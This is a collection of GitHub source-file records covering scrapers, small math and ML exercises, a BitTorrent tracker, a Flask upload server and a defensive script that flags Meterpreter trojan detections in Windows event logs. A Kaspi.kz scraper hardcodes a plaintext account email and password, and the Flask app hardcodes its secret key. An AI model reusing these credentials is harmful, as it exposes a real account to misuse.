\")\n for effect in effects:\n effect_master.append(effect.rstrip(\".\").lower())\n temp = set(effect_master)\n effect_master = list(temp)\n effect_master.sort()\n temp2 = \"\"\n for effect in effect_master:\n temp2 = temp2 + effect + \"\\n\"\n\n with open(\"effectList4.txt\", \"w\") as f:\n f.write(temp2)\n\n\ndef addEffectImageUrls():\n with open(\"effect_cards_neoseeker.txt\") as f:\n effects_cards_string = json.load(f)\n base_img_url = \"https://cdn.staticneo.com/w/digimon/\"\n\n cards = None\n with open(\"cards.json\") as f:\n cards = json.load(f)\n effect_cards = cards[\"effect_cards\"]\n # parse the wiki strings to list\n img_url_list = re.findall(r\"image=\\S+\\n\", effects_cards_string)\n for i, img_url in enumerate(img_url_list):\n url = img_url[len(\"image=\") :].capitalize()\n url = base_img_url + url\n effect_cards[i][\"img_src\"] = url\n\n cards[\"effect_cards\"] = effect_cards\n\n # write effect cards Python list dict to JSON file\n with open(\"effectCards.json\", \"w\") as f:\n json.dump(effect_cards, f, indent=2)\n with open(\"cards.json\", \"w\") as f:\n json.dump(cards, f, indent=2)\n\n\nif __name__ == \"__main__\":\n scrape_page()\n","repo_name":"AsyrafKZ/digital-card-battle-clone-data-collection","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"73074794172","text":"#!/usr/bin/python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import Ridge\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.pipeline import make_pipeline\n\ndef nb_rand (nb):\n\tx=np.random.uniform(-3,10,nb)\n\tx=np.sort(x)\n\treturn x\n\ndef f (x): \n\ty = 10 * np.sin(x)/x + np.random.normal(0,1,15)\n\t#bruit = np.random.normal(0,1,15)\n\n\treturn (y)\n\t\ndef polyReg(deg):\n\treturn make_pipeline(PolynomialFeatures(deg),Ridge())\n\t\n\n\nnp.random.seed(1337)\nx = nb_rand(15)\nx_plot = np.linspace(-3,10,100).reshape(-1,1)\n\ny = f(x)\nx =x.reshape(-1,1)\n\n\nprint(y)\nplt.plot(x,y, color='black', marker='o',linestyle='none',markersize=2)\nplt.xlabel('x')\n\nplt.ylabel('f(x) = 10 * sin(x)/x + gaussian')\nplt.axis([-4, 12, -5, 15])\nplt.grid(True)\n\n\nmodel = polyReg(1)\nmodel.fit(x,y)\ny_pred = model.predict(x)\nx_plot = np.linspace(-3,10,100).reshape(-1,1)\ny_plot = model.predict(x_plot)\nprint(np.mean((y-y_pred)**2))\nplt.plot(x_plot,y_plot,color=\"green\")\n\nmodel = polyReg(3)\nmodel.fit(x,y)\ny_pred = model.predict(x)\nx_plot = np.linspace(-3,10,100).reshape(-1,1)\ny_plot = model.predict(x_plot)\nprint(np.mean((y-y_pred)**2))\nplt.plot(x_plot,y_plot,color=\"red\")\n\nmodel = polyReg(6)\nmodel.fit(x,y)\ny_pred = model.predict(x)\nx_plot = np.linspace(-3,10,100).reshape(-1,1)\ny_plot = model.predict(x_plot)\nprint(np.mean((y-y_pred)**2))\nplt.plot(x_plot,y_plot,color=\"blue\")\n\nmodel = polyReg(9)\nmodel.fit(x,y)\ny_pred = model.predict(x)\nx_plot = np.linspace(-3,10,100).reshape(-1,1)\ny_plot = model.predict(x_plot)\nprint(np.mean((y-y_pred)**2))\nplt.plot(x_plot,y_plot,color=\"yellow\")\n\nmodel = polyReg(12)\nmodel.fit(x,y)\ny_pred = model.predict(x)\nx_plot = np.linspace(-3,10,100).reshape(-1,1)\ny_plot = 
model.predict(x_plot)\nprint(np.mean((y-y_pred)**2))\nplt.plot(x_plot,y_plot,color=\"brown\")\n\n\t\t\t\t\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"xOrzer/Cheh","sub_path":"AA/tp11.py","file_name":"tp11.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17541373686","text":"\ndef leapyear(y):\n\t'''\n\t>>> leapyear(1999)\n\tFalse\n\t>>> leapyear(1968)\n\tTrue\n\t>>> leapyear(2000)\n\tTrue\n\t>>> leapyear(1800)\n\tFalse\n\t'''\n\n\t#if y % 4 == 0:\n\t\t\n\t#\tif y % 100 == 0:\n\t#\t\tif y % 400 == 0:\n\t#\t\t\treturn True # Divisor entre 4, 100 y 400\n\t#\t\telse:\n\t#\t\t\treturn False # Divisor entre 4 y 100 pero no 400\n\t#\telse:\n\t#\t\treturn True # Divisor entre 4 pero no entre 100\n\t#\n\t#else:\n\t#\treturn False\n\t\t\n\t\t\n\t\n\treturn (y%4 == 0 ) and (y%100 != 0 or y%400==0)\t\n\n# This will run the function on the test examples\nif __name__ == \"__main__\":\n\timport doctest\n\tdoctest.testmod(verbose=True)\n","repo_name":"ilialecha/Programming_1","sub_path":"Lists/List_1/leaf_year.py","file_name":"leaf_year.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37498142126","text":"##Problem 120\r\n##\r\n##Let r be the remainder when (a−1)**n + (a+1)**n is divided by a**2.\r\n##\r\n##For example, if a = 7 and n = 3, then r = 42: 63 + 83 = 728 ≡ 42 mod 49.\r\n##And as n varies, so too will r, but for a = 7 it turns out that rmax = 42.\r\n##\r\n##For 3 ≤ a ≤ 1000, find ∑ rmax.\r\n\"\"\"\r\n(a-1)**n + (a+1)**n = 2*sum(a**(n-i)*C_n_i) pour i dans[0,n], pair\r\n\"\"\"\r\n\r\nsom = 0\r\nfor a in range(3, 1001):\r\n if a%2 == 0:\r\n som += a*(a-2)\r\n else:\r\n som += a*(a-1)\r\n\r\nprint(som)\r\n\r\n\r\n\r\n","repo_name":"lenaindelaforetmagique/ProjectEuler","sub_path":"Python/PE120.py","file_name":"PE120.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10078501237","text":"import os\n\nwith open(\"main.c\", \"w\") as s:\n with open(\"template.c\") as f:\n for line in f:\n if line == '// INSTALLATION_SERIAL\\n':\n serial = os.popen(\"ioreg -l | awk '/IOPlatformSerialNumber/ { print $4;}' | awk -F'\\\"' '{ print $2; }'\").read().split(\"\\n\")[0]\n s.write('#define INSTALLATION_SERIAL \"{}\"\\n'.format(serial))\n else:\n s.write(line)\n \nprint(os.popen(\"gcc -c main.c -o main.o && gcc -L. 
-lapp_lib main.o -o app && rm main.c main.o && echo 'installation succeded!\\n' && ./app\").read())\n","repo_name":"katya-varlamova/7-sem-information-security","sub_path":"lab_01/installer.py","file_name":"installer.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31847834719","text":"import requests\nimport json\nfrom config import date_time\n\n\nasync def make_request():\n s = requests.Session()\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n }\n data = {\n \"action\": \"login\",\n \"username\": \"alevtinanur89@gmail.com\",\n \"password\": \"Dmitrii19891989!\"\n }\n login_url = 'https://kaspi.kz/mc/api/login'\n\n s.post(\n url=login_url,\n headers=headers,\n data=data\n )\n return s\n\n\nasync def try_api():\n \"\"\"\n https://kaspi.kz/merchantcabinet/api/order/details/%7Bstatus%7D/210056362\n https://kaspi.kz/merchantcabinet/api/order/search\n {\"searchTerm\":{\"statuses\":[\"ACCEPTED_BY_MERCHANT\",\"SUSPENDED\"],\"term\":null,\"orderTab\":\"DELIVERY\",\"superExpress\":false,\"returnedToWarehouse\":false,\"cityId\":null,\"fromDate\":1658685600000,\"toDate\":1658826819741},\"start\":0,\"count\":10}\n \"\"\"\n s = await make_request()\n headers2 = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\n 'Content-Type': 'application/json',\n }\n\n fromdate = await date_time.start()\n todate = await date_time.time()\n delivery_url = 'https://kaspi.kz/mc/api/orderTabs/active?count=50&selectedTabs=DELIVERY&startIndex=0&returnedToWarehouse=false'\n pickup_url = 'https://kaspi.kz/mc/api/orderTabs/active?count=50&selectedTabs=PICKUP&startIndex=0&returnedToWarehouse=false'\n archive_url = f'https://kaspi.kz/mc/api/orderTabs/archive?start=0&count=50&fromDate={fromdate}&toDate={todate}&statuses=CANCELLED&statuses=COMPLETED&statuses=RETURNED&statuses=RETURN_REQUESTED&statuses=CREDIT_TERMINATION_PROCESS'\n\n request = s.get(\n delivery_url,\n headers=headers2,\n cookies=s.cookies.get_dict()\n )\n\n request2 = s.get(\n archive_url,\n headers=headers2,\n cookies=s.cookies.get_dict()\n )\n\n request3 = s.get(\n pickup_url,\n headers=headers2,\n cookies=s.cookies.get_dict()\n )\n # with open(f'{prod[\"orderCode\"]}_prod_detail.json', 'w', encoding='utf-8') as my_json:\n # json.dump(detail_data.json(), my_json, ensure_ascii=False, indent=4)\n with open('my_product_1.json', 'w', encoding='utf-8') as my_json:\n json.dump(request.json(), my_json, ensure_ascii=False, indent=4)\n\n with open('my_product_2.json', 'w', encoding='utf-8') as my_json:\n json.dump(request2.json(), my_json, ensure_ascii=False, indent=4)\n\n with open('my_product_3.json', 'w', encoding='utf-8') as my_json:\n json.dump(request3.json(), my_json, ensure_ascii=False, indent=4)","repo_name":"TumantaevBaiaman/send_message_to_whatsapp","sub_path":"page_file/fille_get.py","file_name":"fille_get.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"29321701378","text":"import boto3\nimport pandas as pd\nimport numpy as np\nfrom io import StringIO, BytesIO\nfrom datetime import datetime, timedelta\nfrom sklearn.linear_model import LinearRegression\n\n\nclass ETL():\n def __init__(self, bucket_name, target_bucket_name, date):\n self.__s3 = 
boto3.resource('s3')\n self.__bucket = self.__s3.Bucket(bucket_name)\n self.bucket_target = self.__s3.Bucket(target_bucket_name)\n self.date = datetime.strptime(date, '%Y-%m-%d').date() - timedelta(days=1)\n \n \n def extract(self):\n pass\n \n def transform(self, df_all):\n pass\n \n def load(self, df_all):\n pass\n \n def read_csv_to_df(self, objects):\n csv_obj_init = self.__bucket.Object(key=objects[0].key).get().get('Body').read().decode('utf-8')\n data = StringIO(csv_obj_init)\n df_init = pd.read_csv(data, delimiter=',')\n df_all = pd.DataFrame(columns=df_init.columns)\n \n for obj in objects:\n csv_obj = self.__bucket.Object(key=obj.key).get().get('Body').read().decode('utf-8')\n data = StringIO(csv_obj)\n df = pd.read_csv(data, delimiter=',')\n df_all = pd.concat([df, df_all], ignore_index=True)\n \n return df_all\n \n def write_df_to_s3(self, df_all, key):\n out_buffer = BytesIO()\n df_all.to_parquet(out_buffer, index=False)\n self.bucket_target.put_object(Body=out_buffer.getvalue(), Key=key)\n \n def return_objects(self):\n objects = [obj for obj in self.__bucket.objects.all() if datetime.strptime(obj.key.split(\"/\")[0], '%Y-%m-%d').date() >= self.date]\n return objects\n \n\nclass XetraReporte(ETL):\n def __init__(self, bucket_name, target_bucket_name, date):\n super().__init__(bucket_name, target_bucket_name, date)\n \n def extract(self):\n objects = self.return_objects()\n df_all = self.read_csv_to_df(objects)\n return df_all\n \n def transform(self, df_all):\n df_all.dropna(inplace=True)\n df_all['start_price'] = df_all.sort_values(by=['Time']).groupby(['ISIN', 'Date'])['StartPrice'].transform('first')\n df_all['end_price'] = df_all.sort_values(by=['Time']).groupby(['ISIN', 'Date'])['EndPrice'].transform('last')\n df_all = df_all.query('\"08:00\" < Time < \"12:00\"').groupby(['ISIN', 'Date'], as_index=False).agg(start_price=('start_price', 'min'), end_price=('end_price', 'min'), minimum_price=('MinPrice', 'min'), maximum_price=('MaxPrice', 'max'), daily_traded_volume=('TradedVolume', 'sum'))\n df_all[\"end_price_mx\"] = df_all[\"end_price\"] * 19.08\n deviation = ['start_price','end_price']\n df_all[\"standard_deviation\"] = df_all[deviation].std(axis=1)\n return df_all\n \n\n def load(self, df_all):\n key = 'xetra_daily_report_' + datetime.today().strftime(\"%Y%m%d_%H%M%S\") + '.parquet'\n self.write_df_to_s3(df_all, key)\n\n def etl_report(self, key):\n prq_obj = self.bucket_target.Object(key=key).get().get('Body').read()\n data = BytesIO(prq_obj)\n df_report = pd.read_parquet(data)\n return df_report\n\n def run(self):\n df_all = self.extract()\n df_transformed = self.transform(df_all)\n model = self.linear_regression(df_transformed)\n print(model)\n print('DATAFRAME TRANSFORMADO:')\n print(df_transformed)\n self.load(df_transformed)\n\n\n def linear_regression(self, df_all):\n # Selecciona la columna 'end_price' donde la fecha se encuentre entre 'arg_date' y 'arg_date + 1 día'\n y = df_all.query(f'Date == \"{self.date}\"')['end_price']\n \n # Crea una matriz X con los valores de la columna 'start_price'\n x = np.array(df_all.query(f'Date == \"{self.date}\"')['start_price']).reshape(-1, 1)\n \n # Crea una instancia de la clase LinearRegression\n model = LinearRegression()\n \n # Entrena el modelo con los datos\n model.fit(x, y)\n \n print('COEFICIENTES:')\n print(model.coef_)\n print('INTERCEPTO DE MODELO:')\n print(model.intercept_)\n \n return model\n \n\n# Crear una instancia de la clase\nreport = XetraReporte(bucket_name='xetra-1234', target_bucket_name='xetra-ajlj', 
date='2022-12-31')\n\n# Ejecutar el proceso ETL\nreport.run()\n\n# Obtener el reporte\nkey = 'xetra_daily_report_20230328_000509.parquet'\ndf_report = report.etl_report(key)\n","repo_name":"AlanJLJ2202/xetra-project","sub_path":"2do_Parcial/Proyecto_2P.py","file_name":"Proyecto_2P.py","file_ext":"py","file_size_in_byte":4430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19885660197","text":"import os\nimport csv\nimport pickle\n\nevent_ids=[\"1116\"]\nevent_des=[\"Trojan:Win64/Meterpreter\",\"Trojan:Win32/Meterpreter\"]\n\n# Module input: event_list from windows-event-log-parser.py\n\ndef main(event_list):\n for f in event_list:\n found=[]\n n=0\n for row in event_list[f]:\n n+=1\n if any(row[0]==id for id in event_ids) and any(des in row[1] for des in event_des) :\n found.append(n)\n print(\"##################################\")\n print(\"%d rows processed in file: %s\"%(n,f))\n if len(found)>0:\n print(\"Found initial intrusion by meterpreter at: %s!\"%str(found))\n else:\n print(\"Not found initial intrusion by meterpreter.\")\n print()\n\nif __name__==\"__main__\":\n fi=open('tmp.pickle','rb')\n event_list=pickle.load(fi)\n fi.close()\n main(event_list)\n","repo_name":"Qingtian-Zou/AP-detection-framework","sub_path":"identifiers/drive-by-download.py","file_name":"drive-by-download.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36221250100","text":"from django.forms.models import model_to_dict\nfrom django.http import HttpResponse\n\n\n\ndef get_tro_dates_to_dict(tro_dates):\n \"\"\"Convert tro_dates into a dict ready for json serialization.\"\"\"\n vacations = tro_dates['vacations']\n unavailabilities = tro_dates['unavailabilities']\n \n vacations_as_dicts = []\n for v in vacations:\n vacation_dict = model_to_dict(v)\n vacations_as_dicts.append(vacation_dict)\n \n unavailabilities_as_dicts = []\n for u in unavailabilities:\n unavailabilities_dict = model_to_dict(u)\n unavailabilities_as_dicts.append(unavailabilities_dict)\n \n return {'vacations': vacations_as_dicts, \n 'unavailabilities': unavailabilities_as_dicts}\n \n \ndef eligable_list_to_dict(eligable_list):\n \"\"\"Convert eligable_list into a dict ready for json serialization.\n \n Args:\n eligable_list: list of sorted eligables with an availability dict and\n a sorting score.\n Returns:\n The eligible list formatted into dicts to be serialized by json.\n \"\"\"\n \n eligable_serialized_list = []\n \n for e in eligable_list['eligables']:\n eligable_serialized = {}\n eligable_serialized_list.append(eligable_serialized)\n \n # Serialize the employee model\n employee_serialized = model_to_dict(e['employee'])\n eligable_serialized['employee'] = employee_serialized\n # Serialize the availability dict\n avail_serialized = _availability_to_dict(e['availability'])\n eligable_serialized['availability'] = avail_serialized\n \n # Serialize the corresponding schedule\n serialized_schedule = model_to_dict(eligable_list['schedule'])\n \n data = {'schedule': serialized_schedule, \n 'eligable_list': eligable_serialized_list}\n \n return data\n \n \ndef _availability_to_dict(availability):\n \"\"\"Convert availability into a dict ready for json serialization.\n \n Args:\n availability: list containing django querysets and other information\n compiled by the get_availability function.\n Returns:\n Availability formatted into dicts to be serialized by json.\n \"\"\"\n \n 
MODEL_AVAILABILITIES = ('(S)', '(V)', '(A)', '(U)', 'Desired Times')\n avail_serialized = {}\n \n for key in MODEL_AVAILABILITIES:\n serialized_conflicts = []\n for conflict in availability[key]:\n serial_conf = model_to_dict(conflict)\n serialized_conflicts.append(serial_conf)\n \n avail_serialized[key] = serialized_conflicts\n \n avail_serialized['(O)'] = availability['(O)']\n avail_serialized['Hours Scheduled'] = availability['Hours Scheduled']\n avail_serialized['curr_hours'] =availability['curr_hours']\n \n return avail_serialized\n \n \ndef get_json_err_response(msg):\n \"\"\"Create error json response with given error message.\"\"\"\n response = HttpResponse(json.dumps({'err': msg}), \n content_type='application/json')\n response.status_code = 400\n return response\n \n \ndef date_handler(obj):\n \"\"\"Add converting instructions to JSON parser for datetime objects. \n \n Written by Anthony Hatchkins: \n http://stackoverflow.com/questions/23285558/datetime-date2014-4-25-is-not-json-serializable-in-django\n \"\"\"\n \n if hasattr(obj, 'isoformat'):\n return obj.isoformat()\n else:\n raise TypeError ","repo_name":"RyanKJ/ScheduleHours","sub_path":"schedulingcalendar/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37646979754","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n__author__ = 'komorebi'\n\n\"\"\"\nIt is possible to implement a queue such that both enqueue and dequeue have 𝑂(1) performance on average.\nIn this case it means that most of the time enqueue and dequeue will be 𝑂(1)\nexcept in one particular circumstance where dequeue will be 𝑂(𝑛).\nuse a limited-size list to implement a queue\n\"\"\"\n\n\nclass Queue:\n def __init__(self, max_size=10):\n self.items = [None for i in range(max_size)]\n\n self.max_size = max_size\n self.length = 0\n self.front = -1\n self.rear = -1\n\n def is_empty(self):\n return self.front == self.rear is None\n\n def _is_full(self):\n if self.front == 0 and self.rear == self.max_size - 1:\n return True\n if self.front is not None and self.rear == self.front - 1:\n return True\n\n def _add_new_space(self):\n self.items.extend(None for i in range(self.max_size * 2))\n self.max_size *= 3\n\n def enqueue(self, value):\n need_to_more_space = self._is_full()\n if need_to_more_space:\n self._add_new_space()\n if self.is_empty():\n\n self.rear += 1\n self.front = self.rear\n\n elif self.front == 0 and self.rear < self.max_size - 1:\n self.rear += 1\n self.items[self.rear] = value\n elif self.front > 0 and self.rear == self.max_size - 1:\n self.rear = 0\n self.items[self.rear] = value\n else: # 0 < rear < front\n self.rear += 1\n self.items[self.rear] = value\n self.items[0] = value\n self.length += 1\n\n def dequeue(self):\n if self.is_empty():\n raise Exception('Empty queue')\n if self.front < self.max_size - 1 and self.front != self.rear:\n self.items[self.front] = None\n self.front += 1\n elif self.rear < self.front == self.max_size - 1:\n self.items[self.front] = None\n self.front = self.rear\n elif self.front == self.rear is not None: # last element\n self.items[self.front] = None\n self.front = self.rear = None\n self.length -= 1\n\n\nif __name__ == '__main__':\n q = Queue(3)\n print(q.items, q.front, q.rear, q.length)\n q.enqueue(0)\n print(q.items, q.front, q.rear, q.length)\n q.enqueue(1)\n print(q.items, q.front, q.rear, q.length)\n q.enqueue(2)\n print(q.items, q.front, q.rear, 
q.length)\n\n q.dequeue()\n print(q.items, q.front, q.rear, q.length)\n q.dequeue()\n\n print(q.items, q.front, q.rear, q.length)\n q.enqueue(4)\n print(q.items, q.front, q.rear, q.length)\n q.dequeue()\n print(q.items, q.front, q.rear, q.length)\n q.enqueue(5)\n print(q.items, q.front, q.rear, q.length)\n q.dequeue()\n print(q.items, q.front, q.rear, q.length)\n q.enqueue(6)\n print(q.items, q.front, q.rear, q.length)\n # q.enqueue(3)\n # print(q.items, q.front, q.rear, len(q.items))\n # q.enqueue(4)\n # print(q.items, q.front, q.rear, len(q.items))\n # q.enqueue(5)\n # print(q.items, q.front, q.rear, len(q.items))\n # q.enqueue(6)\n # print(q.items, q.front, q.rear, len(q.items))\n # q.enqueue(7)\n # print(q.items, q.front, q.rear, len(q.items))\n # q.enqueue(8)\n # print(q.items, q.front, q.rear, len(q.items))\n","repo_name":"lost-komorebi/Data-Structures-and-Algorithms-Python-Coding","sub_path":"stack_and_queue/exercise/queue_implementation_by_list.py","file_name":"queue_implementation_by_list.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33552716431","text":"# official documentation\n# https://pytorch.org/docs/stable/torchvision/transforms.html\n\nimport torch as t\nimport torchvision as tv\nfrom torch.utils.data import Dataset, DataLoader\nimport numpy as np\nfrom torchvision import transforms\n\nclass WineDataset(Dataset):\n def __init__(self, transform=None):\n xy = np.loadtxt(\"data/wine/wine.csv\",\n delimiter=',',\n dtype=np.float32,\n skiprows=1)\n\n self.n_samples = xy.shape[0]\n \n self.x = xy[:, 1:]\n self.y = xy[:, [0]]\n\n self.transform = transform\n \n def __getitem__(self, index):\n sample = self.x[index], self.y[index]\n \n if self.transform:\n sample = self.transform(sample)\n \n return sample\n\n def __len__(self):\n return self.n_samples\n\n# custom transform\nclass ToTensor():\n def __call__(self, sample):\n inputs, target = sample\n return t.from_numpy(inputs), t.from_numpy(target)\n\nclass MulTransform():\n def __init__(self, factor):\n self.factor = factor\n def __call__(self, sample):\n inputs, target = sample\n inputs *= self.factor\n return inputs, target\n\ndataset = WineDataset(transform=ToTensor())\nfirst_data = dataset[0]\nfeature, labels = first_data\nprint(type(feature), type(labels))\n\ncomposed = tv.transforms.Compose([\n ToTensor(),\n MulTransform(2)\n])\n\ndataset = WineDataset(transform=composed)\nfirst_data = dataset[0]\nfeature, labels = first_data\nprint(type(feature), type(labels))","repo_name":"koochak-mehdi/PyTorch_Basics","sub_path":"04_dataset_and_transforms.py","file_name":"04_dataset_and_transforms.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40839191931","text":"import torrent_parser\nimport hashlib, os, time\n\n\nimport flask\n\nimport sys\n\nfrom database import Database\n\nimport json, utils_tracker, socket, threading\n\nfrom utils_tracker import get_key\n\ndef _print(text, flag='a'):\n with open(\"tracker_trace\", flag) as f:\n f.write(f\"{text}\\n\")\n\ndef get_infohash(metainfo):\n return hashlib.sha1(torrent_parser.encode(metainfo[\"info\"])).hexdigest()\n\nclass Tracker:\n # 6666\n def attend_clients(self):\n sock = socket.socket()\n sock.bind((self.database.ip, 6660))\n sock.listen(256)\n\n def attend(client):\n while True:\n try:\n msg = client.recv(1024)\n except: continue\n if not msg:\n break\n # 
threading._start_new_thread(self.proccess_message, ())\n threading.current_thread()._delete()\n\n def attend_saved(sock):\n try:\n attend(c)\n except Exception as ex:\n print('EXCEPCION EN attend_clients')\n print(ex)\n threading.current_thread()._delete()\n\n while True:\n c, _ = sock.accept()\n threading._start_new_thread(attend_saved, (c,))\n\n def proccess_message(self, data, addr):\n if data['operation'] == 'DISCOVER':\n ip, port = str(data['ip']), int(data['port'])\n sock = socket.socket()\n try:\n sock.connect((ip, port))\n server_ip = self.database.ip\n my_addr = server_ip, 5000\n sock.send(json.dumps(my_addr).encode())\n except: pass\n sock.close()\n threading.current_thread()._delete()\n\n def attend_new_nodes(self):\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.bind((self.database.ip, 6666))\n while True:\n try:\n msg, _ = sock.recvfrom(1024)\n except Exception as e:\n print('EXCEPCION EN attend_new_nodes')\n print(e)\n continue\n\n if msg is not None:\n data = json.loads(msg)\n addr = data['sender'][1], data['sender'][2]\n threading._start_new_thread(self.proccess_message, (data, addr))\n\n def __init__(self, ip, port=5050, request_interval=5, min_interval=5):\n self.database = Database(ip, port)\n threading._start_new_thread(self.attend_clients, ())\n threading._start_new_thread(self.attend_new_nodes, ())\n\n def build_response(self, request):\n answer = {}\n answer[\"peers\"] = self.database[get_key(request['name'] + request['infohash'] + 'peers')]\n answer[\"peers\"] = answer[\"peers\"] if answer[\"peers\"] else []\n return answer\n\n\napp = flask.Flask(__name__)\n\nTRACKER = None\n\n@app.route('/announce')\ndef announce():\n response = TRACKER.build_response(flask.request.args)\n return json.dumps(response)\n\n@app.route('/have//////', methods=[\"PUT\"])\ndef have(client_id, ip, port, portion, name, infohash):\n TRACKER.database[name + infohash + \"peers\"] = utils_tracker.assign(data={\"ip\": ip, \"port\": int(port), \"id\": client_id}, to_update=True)\n return \"\"\n\n@app.route('/search')\ndef search():\n pattern_torrents_keys_dic = TRACKER.database[utils_tracker.INDEX_KEY]\n name = flask.request.args[\"name\"]\n \n torrent_keys = []\n if name in pattern_torrents_keys_dic:\n torrent_keys = pattern_torrents_keys_dic[name]\n\n metainfos = []\n for key in torrent_keys:\n metainfo = TRACKER.database[key]\n metainfos.append(metainfo)\n return json.dumps(metainfos)\n\n@app.route('/metainfo///', methods=[\"POST\"])\ndef metainfo(client_id, ip, port):\n if flask.request.method == \"POST\":\n metainfo_encoded = flask.request.data\n metainfo_decoded = torrent_parser.decode(metainfo_encoded)\n name = metainfo_decoded[\"info\"][\"name\"]\n infohash = get_infohash(metainfo_decoded)\n\n #Real app\n TRACKER.database[name + infohash + \"metainfo\"] = utils_tracker.assign(metainfo_decoded, name)\n TRACKER.database[name + infohash + \"peers\"] = utils_tracker.assign({\"ip\": ip, \"port\": int(port), \"id\": client_id}, to_update=True)\n\n return \"\"\n\nif __name__ == \"__main__\":\n #real app\n import argparse, socket\n parser = argparse.ArgumentParser()\n parser.add_argument('-ip', '--ip', type=str, default=None)\n parser.add_argument('-port', '--port', type=int, default=5050)\n\n args = parser.parse_args()\n IP = args.ip\n port = int(args.port)\n\n if not IP:\n hostname = socket.gethostname()\n IP = socket.gethostbyname(hostname)\n\n TRACKER = Tracker(IP, port)\n\n # TRACKER = Tracker(\"localhost\", 5000)\n\n app.run(host=IP, 
port=5000)","repo_name":"ginrod/bittorrent","sub_path":"tracker/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6640525289","text":"#!/usr/bin/env python3\n\nimport os\n\nfrom flask import Flask, flash, request, redirect, url_for, send_from_directory\n\n\nUPLOAD_FOLDER = os.path.join(os.path.dirname(__file__), 'uploads')\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\napp.config['SECRET_KEY'] = b'\\xbe\\x08\\xed\\x13\\xe0\\xc4\\xf3\\x06\\x02I\\xefp\\xebX\\xfb.'\n\n\ndef secure_filename(filename):\n return filename.split('/').pop()\n\n\ndef render_form():\n return \"\"\"\n \n \n UPload new File\n \n
\n \n \n
\n \n \n \"\"\"\n\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n if 'file' not in request.files:\n app.logger.warning('No file part')\n flash('No file part')\n return redirect(request.url)\n file = request.files['file']\n if file.filename == '':\n app.logger.warning('No selected file')\n flash('No selected file')\n return redirect(request.url)\n\n app.logger.warning('received new file %s' % file.filename)\n filename = secure_filename(file.filename)\n app.logger.warning('A new file uploaded: %s' % filename)\n save_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)\n file.save(save_path)\n app.logger.warning('%s save success' % save_path)\n\n return redirect(url_for('download_file', name=filename))\n\n return render_form()\n\n\n\n@app.route('/uploads/')\ndef download_file(name):\n return send_from_directory(app.config['UPLOAD_FOLDER'], name)\n\napp.add_url_rule(\n \"/uploads/\", endpoint=\"download_file\", build_only=True\n)\n\n\ndef create_app():\n return app\n\nif __name__ == '__main__':\n app.run(port=5000)\n","repo_name":"raojinlin/fileuploads","sub_path":"fileuploads.py","file_name":"fileuploads.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27406911092","text":"from oricrete.folding2 import \\\n YoshimuraCreasePattern, CnstrTargetFace, Folding, Initialization, FormFinding, CreasePatternView, \\\n fix, r_, s_, t_\n\nimport numpy as np\n\nL_x = 8.0\nL_y = 6.0\nv = 1.0\n\ncp = YoshimuraCreasePattern(L_x=L_x, L_y=6, n_x=2, n_y=4)\n\nn_corners = cp.N_h[(0, 0, -1, -1), (0, -1, 0, -1)].flatten()\nn_vertical_boundaries = cp.N_h[(0, -1), 1].flatten()\nn_horizontal_boundaries = cp.N_h[1, (0, -1)].flatten()\nn_midnode = cp.N_h[1,1].flatten()\nn_left_right = cp.N_v.flatten()\nn_i = cp.N_i.flatten()\n\nall_fixed = np.unique( np.hstack([n_corners \n ,\n ]) )\n\n# vault_height = [([(cp.N_h[0, 0], 0, L_x), (cp.N_h[0, 0], 1, -L_y)], 0),\n# ([(cp.N_h[-1, 0], 0, L_x), (cp.N_h[-1, 0], 1, L_y)], 0),\n# ([(cp.N_h[-1, -1], 0, L_x), (cp.N_h[-1, -1], 1, -L_y)], 0),\n# ([(cp.N_h[0, -1], 0, L_x), (cp.N_h[0, -1], 1, L_y)], 0),\n# 